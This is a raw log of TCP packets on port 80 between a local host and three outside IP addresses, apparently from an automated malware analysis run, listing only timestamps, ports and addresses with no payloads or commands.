Jul 15, 2024 06:12:55.499610901 CEST	80	49734	58.151.148.90	192.168.2.5
Jul 15, 2024 06:12:55.499692917 CEST	49734	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:12:55.499866962 CEST	49734	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:12:55.499907970 CEST	49734	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:12:55.507775068 CEST	80	49734	58.151.148.90	192.168.2.5
Jul 15, 2024 06:12:55.507798910 CEST	80	49734	58.151.148.90	192.168.2.5
Jul 15, 2024 06:12:56.949840069 CEST	80	49734	58.151.148.90	192.168.2.5
Jul 15, 2024 06:12:56.950232029 CEST	80	49734	58.151.148.90	192.168.2.5
Jul 15, 2024 06:12:56.950293064 CEST	49734	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:12:56.950361013 CEST	49734	80	192.168.2.5	58.151.148.90
Jul 15, 2024 06:12:56.956588984 CEST	80	49734	58.151.148.90	192.168.2.5
Jul 15, 2024 06:13:06.579454899 CEST	49735	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:06.584429026 CEST	80	49735	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:06.584536076 CEST	49735	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:06.584767103 CEST	49735	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:06.584815979 CEST	49735	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:06.589657068 CEST	80	49735	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:06.589756966 CEST	80	49735	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:07.645116091 CEST	80	49735	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:07.645318985 CEST	80	49735	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:07.645493031 CEST	49735	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:07.645493031 CEST	49735	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:07.650397062 CEST	80	49735	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:09.386003971 CEST	49736	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:09.390919924 CEST	80	49736	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:09.391006947 CEST	49736	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:09.391093016 CEST	49736	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:09.395884037 CEST	80	49736	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:10.199902058 CEST	80	49736	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:10.200053930 CEST	49736	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:10.205276966 CEST	80	49736	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:10.205481052 CEST	49736	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:12.328385115 CEST	49737	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:12.333658934 CEST	80	49737	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:12.333744049 CEST	49737	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:12.333853006 CEST	49737	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:12.333868027 CEST	49737	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:12.338629961 CEST	80	49737	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:12.338759899 CEST	80	49737	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:12.383299112 CEST	49738	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:12.388186932 CEST	80	49738	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:12.388261080 CEST	49738	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:12.388534069 CEST	49738	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:12.393341064 CEST	80	49738	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:13.112035036 CEST	80	49738	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:13.112174034 CEST	49738	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:13.117517948 CEST	80	49738	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:13.117625952 CEST	49738	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:13.342569113 CEST	49739	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:13.347405910 CEST	80	49739	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:13.348608017 CEST	49739	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:13.348712921 CEST	49739	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:13.354429007 CEST	80	49739	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:13.393059969 CEST	80	49737	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:13.393078089 CEST	80	49737	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:13.393140078 CEST	49737	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:13.393273115 CEST	49737	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:13.398047924 CEST	80	49737	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:14.045598030 CEST	80	49739	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:14.045797110 CEST	49739	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:14.051212072 CEST	80	49739	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:14.051301003 CEST	49739	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:14.059015989 CEST	49740	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:14.063957930 CEST	80	49740	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:14.065023899 CEST	49740	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:14.066075087 CEST	49740	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:14.070882082 CEST	80	49740	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:14.759726048 CEST	80	49740	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:14.759995937 CEST	49740	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:14.765199900 CEST	80	49740	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:14.765266895 CEST	49740	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:14.766431093 CEST	49741	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:14.771289110 CEST	80	49741	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:14.771394014 CEST	49741	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:14.779076099 CEST	49741	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:14.783868074 CEST	80	49741	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:15.497977972 CEST	80	49741	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:15.498157024 CEST	49741	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:15.503312111 CEST	80	49741	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:15.503485918 CEST	49741	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:17.754713058 CEST	49742	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:17.759684086 CEST	80	49742	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:17.759872913 CEST	49742	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:17.760041952 CEST	49742	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:17.760086060 CEST	49742	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:17.978883028 CEST	80	49742	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:17.978899956 CEST	80	49742	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:19.037774086 CEST	80	49742	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:19.037939072 CEST	80	49742	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:19.038012981 CEST	49742	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:19.038187981 CEST	49742	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:19.043098927 CEST	80	49742	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:23.066382885 CEST	49743	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:23.071641922 CEST	80	49743	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:23.073935032 CEST	49743	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:23.074628115 CEST	49743	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:23.079607964 CEST	80	49743	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:23.079668999 CEST	80	49743	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:23.079698086 CEST	80	49743	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:23.079727888 CEST	80	49743	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:23.079749107 CEST	49743	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:23.079772949 CEST	49743	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:23.079819918 CEST	80	49743	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:23.079873085 CEST	80	49743	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:23.079874039 CEST	49743	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:23.079901934 CEST	80	49743	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:23.079952002 CEST	80	49743	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:23.079952955 CEST	49743	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:23.079979897 CEST	80	49743	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:23.084265947 CEST	80	49743	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:23.084825993 CEST	80	49743	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:23.084857941 CEST	80	49743	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:23.084887981 CEST	80	49743	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:23.084938049 CEST	80	49743	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:23.084964991 CEST	80	49743	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:23.084991932 CEST	80	49743	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:23.127449036 CEST	80	49743	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:23.551491976 CEST	49744	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:23.556418896 CEST	80	49744	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:23.556534052 CEST	49744	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:23.556608915 CEST	49744	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:23.556642056 CEST	49744	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:23.561451912 CEST	80	49744	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:23.561539888 CEST	80	49744	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:23.905800104 CEST	80	49743	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:23.907665014 CEST	49743	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:23.913068056 CEST	80	49743	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:23.913193941 CEST	49743	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:24.002290964 CEST	49745	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:24.007229090 CEST	80	49745	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:24.007316113 CEST	49745	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:24.007376909 CEST	49745	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:24.012132883 CEST	80	49745	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:24.612420082 CEST	80	49744	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:24.612670898 CEST	80	49744	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:24.612754107 CEST	49744	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:24.612850904 CEST	49744	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:24.617743969 CEST	80	49744	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:24.720376968 CEST	80	49745	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:24.720535040 CEST	49745	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:24.725661039 CEST	80	49745	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:24.725733042 CEST	49745	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:24.725794077 CEST	49746	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:24.730617046 CEST	80	49746	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:24.730701923 CEST	49746	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:24.730767012 CEST	49746	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:24.735598087 CEST	80	49746	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:25.444513083 CEST	80	49746	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:25.444788933 CEST	49746	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:25.450258970 CEST	80	49746	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:25.450320005 CEST	49746	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:25.916378021 CEST	49747	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:25.921489000 CEST	80	49747	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:25.921578884 CEST	49747	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:25.921644926 CEST	49747	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:25.926414967 CEST	80	49747	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:26.615010977 CEST	80	49747	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:26.615201950 CEST	49747	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:26.621124029 CEST	80	49747	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:26.621212006 CEST	49747	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:27.009649992 CEST	49748	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:27.014853954 CEST	80	49748	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:27.014935017 CEST	49748	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:27.015256882 CEST	49748	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:27.020092964 CEST	80	49748	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:27.709989071 CEST	80	49748	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:27.710159063 CEST	49748	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:27.715509892 CEST	80	49748	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:27.715595961 CEST	49748	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:27.831125021 CEST	49749	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:27.836219072 CEST	80	49749	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:27.836327076 CEST	49749	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:27.837039948 CEST	49749	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:27.841927052 CEST	80	49749	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:28.531898022 CEST	80	49749	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:28.532064915 CEST	49749	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:28.537249088 CEST	80	49749	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:28.537420034 CEST	49749	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:28.713007927 CEST	49750	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:28.718378067 CEST	80	49750	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:28.718475103 CEST	49750	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:28.731926918 CEST	49750	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:28.731926918 CEST	49750	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:28.736830950 CEST	80	49750	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:28.736979961 CEST	80	49750	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:28.985532045 CEST	49751	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:28.990715027 CEST	80	49751	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:28.990803957 CEST	49751	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:28.990973949 CEST	49751	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:28.991024017 CEST	49751	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:28.995794058 CEST	80	49751	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:28.995824099 CEST	80	49751	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:29.404126883 CEST	80	49750	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:29.404407978 CEST	49750	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:29.409682035 CEST	80	49750	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:29.409768105 CEST	49750	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:29.541858912 CEST	49752	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:29.546776056 CEST	80	49752	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:29.546886921 CEST	49752	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:29.547022104 CEST	49752	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:29.547022104 CEST	49752	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:29.551769018 CEST	80	49752	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:29.551881075 CEST	80	49752	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:30.064647913 CEST	80	49751	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:30.064672947 CEST	80	49751	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:30.064954996 CEST	49751	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:30.065016031 CEST	49751	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:30.069782019 CEST	80	49751	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:30.252144098 CEST	80	49752	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:30.252444029 CEST	49752	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:30.257757902 CEST	80	49752	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:30.257828951 CEST	49752	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:30.390256882 CEST	49753	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:30.397214890 CEST	80	49753	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:30.397310019 CEST	49753	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:30.403887033 CEST	49753	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:30.403887033 CEST	49753	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:30.409007072 CEST	80	49753	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:30.409260035 CEST	80	49753	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:31.135555029 CEST	80	49753	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:31.135869026 CEST	49753	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:31.141084909 CEST	80	49753	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:31.141169071 CEST	49753	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:31.404618025 CEST	49754	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:31.409542084 CEST	80	49754	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:31.409646034 CEST	49754	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:31.409737110 CEST	49754	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:31.409737110 CEST	49754	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:31.415138960 CEST	80	49754	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:31.415152073 CEST	80	49754	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:32.240799904 CEST	80	49754	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:32.240988970 CEST	49754	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:32.246243000 CEST	80	49754	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:32.246316910 CEST	49754	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:32.362185955 CEST	49755	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:32.367302895 CEST	80	49755	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:32.367373943 CEST	49755	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:32.372627020 CEST	49755	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:32.377468109 CEST	80	49755	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:33.062006950 CEST	80	49755	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:33.062284946 CEST	49755	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:33.067810059 CEST	80	49755	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:33.067898989 CEST	49755	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:33.177659035 CEST	49756	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:33.182717085 CEST	80	49756	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:33.182807922 CEST	49756	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:33.184720039 CEST	49756	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:33.189572096 CEST	80	49756	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:33.875711918 CEST	80	49756	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:33.875895023 CEST	49756	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:33.884557962 CEST	80	49756	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:33.884648085 CEST	49756	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:33.986480951 CEST	49757	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:33.992403984 CEST	80	49757	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:33.992577076 CEST	49757	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:33.993194103 CEST	49757	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:33.998075962 CEST	80	49757	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:34.444431067 CEST	49758	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:34.449757099 CEST	80	49758	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:34.449856043 CEST	49758	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:34.450016022 CEST	49758	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:34.450048923 CEST	49758	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:34.454833031 CEST	80	49758	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:34.454864025 CEST	80	49758	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:34.700542927 CEST	80	49757	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:34.700956106 CEST	49757	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:34.706315041 CEST	80	49757	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:34.706391096 CEST	49757	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:34.825134993 CEST	49759	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:34.830049992 CEST	80	49759	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:34.830151081 CEST	49759	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:34.830212116 CEST	49759	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:34.835005999 CEST	80	49759	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:35.504586935 CEST	80	49758	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:35.504837036 CEST	80	49758	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:35.504950047 CEST	49758	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:35.504950047 CEST	49758	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:35.509990931 CEST	80	49758	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:35.526278973 CEST	80	49759	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:35.526442051 CEST	49759	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:35.531793118 CEST	80	49759	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:35.531877995 CEST	49759	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:35.642630100 CEST	49760	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:35.647495985 CEST	80	49760	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:35.647603989 CEST	49760	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:35.648220062 CEST	49760	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:35.653168917 CEST	80	49760	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:36.338210106 CEST	80	49760	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:36.338502884 CEST	49760	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:36.344178915 CEST	80	49760	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:36.344258070 CEST	49760	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:36.455415964 CEST	49761	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:36.460441113 CEST	80	49761	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:36.460537910 CEST	49761	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:36.461169004 CEST	49761	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:36.465953112 CEST	80	49761	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:37.280277967 CEST	80	49761	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:37.280590057 CEST	49761	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:37.285710096 CEST	80	49761	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:37.285784960 CEST	49761	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:37.396727085 CEST	49762	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:37.401680946 CEST	80	49762	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:37.401891947 CEST	49762	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:37.401891947 CEST	49762	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:37.406759977 CEST	80	49762	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:38.115818024 CEST	80	49762	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:38.116138935 CEST	49762	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:38.121637106 CEST	80	49762	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:38.121735096 CEST	49762	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:38.223567963 CEST	49763	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:38.228569984 CEST	80	49763	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:38.228656054 CEST	49763	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:38.228734016 CEST	49763	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:38.233561993 CEST	80	49763	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:38.917354107 CEST	80	49763	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:38.917541981 CEST	49763	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:38.922790051 CEST	80	49763	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:38.922854900 CEST	49763	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:39.033492088 CEST	49764	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:39.038479090 CEST	80	49764	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:39.038566113 CEST	49764	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:39.039186954 CEST	49764	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:39.043973923 CEST	80	49764	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:39.754393101 CEST	80	49764	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:39.754573107 CEST	49764	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:39.759700060 CEST	80	49764	46.246.96.149	192.168.2.5
Jul 15, 2024 06:13:39.759779930 CEST	49764	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:13:39.805479050 CEST	49765	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:39.810369015 CEST	80	49765	186.101.193.110	192.168.2.5
Jul 15, 2024 06:13:39.810451031 CEST	49765	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:39.810580015 CEST	49765	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:39.810616016 CEST	49765	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:13:39.815337896 CEST	80	49765	186.101.193.110	192.168.2.5
